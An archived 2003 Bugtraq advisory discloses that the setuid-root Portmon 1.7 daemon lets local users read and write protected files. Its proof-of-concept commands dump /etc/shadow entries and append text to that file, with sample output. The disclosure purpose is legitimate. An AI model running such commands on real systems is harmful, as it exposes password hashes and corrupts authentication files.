105241 2003-06-18 20:19 /71 rader/ David Hancock <dmhancoc@us.ibm.com> Importerad: 2003-06-18 20:19 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <5247> Ärende: Portmon file arbitrary read/write access vulnerability ------------------------------------------------------------ Package: Portmon Auth: http://www.aboleo.net/ Version(s): 1.7 (prior ?) Vulnerability: File arbitrary read/write access vulnerability Portmon is a network service monitoring daemon (http://www.aboleo.net/software/portmon/). "In order to use ping support, Portmon must run as root or be installed setuid with root permissions due to the fact that it must open up a raw socket." The product suffer from a security problem that allows any local user to read/write protected files on the system. This is dude to a hole in the way the program handles loading of two configuration files: host file/log file. Example (read): [lucae@linux lucae]$portmon -c /etc/shadow Unable to resolve hostname root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7::: Unable to resolve hostname bin:*:12172:0:99999:7::: Unable to resolve hostname daemon:*:12172:0:99999:7::: Unable to resolve hostname adm:*:12172:0:99999:7::: Unable to resolve hostname lp:*:12172:0:99999:7::: Unable to resolve hostname sync:*:12172:0:99999:7::: Unable to resolve hostname shutdown:*:12172:0:99999:7::: Unable to resolve hostname halt:*:12172:0:99999:7::: Unable to resolve hostname mail:*:12172:0:99999:7::: Unable to resolve hostname news:*:12172:0:99999:7::: <snip> Example (write): [lucae@linux lucae]$portmon -l /etc/shadow fopen: No such file or directory Failed reading config file hosts [root@linux root]#cat /etc/shadow <snip> lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7::: nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7::: test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7::: (Mon Jun 16 01:40:17 2003) - Portmon started by user lucae //line added [root@linux root]# Luca Ercoli luca.ercoli[at]inwind.it (105241) /David Hancock <dmhancoc@us.ibm.com>/------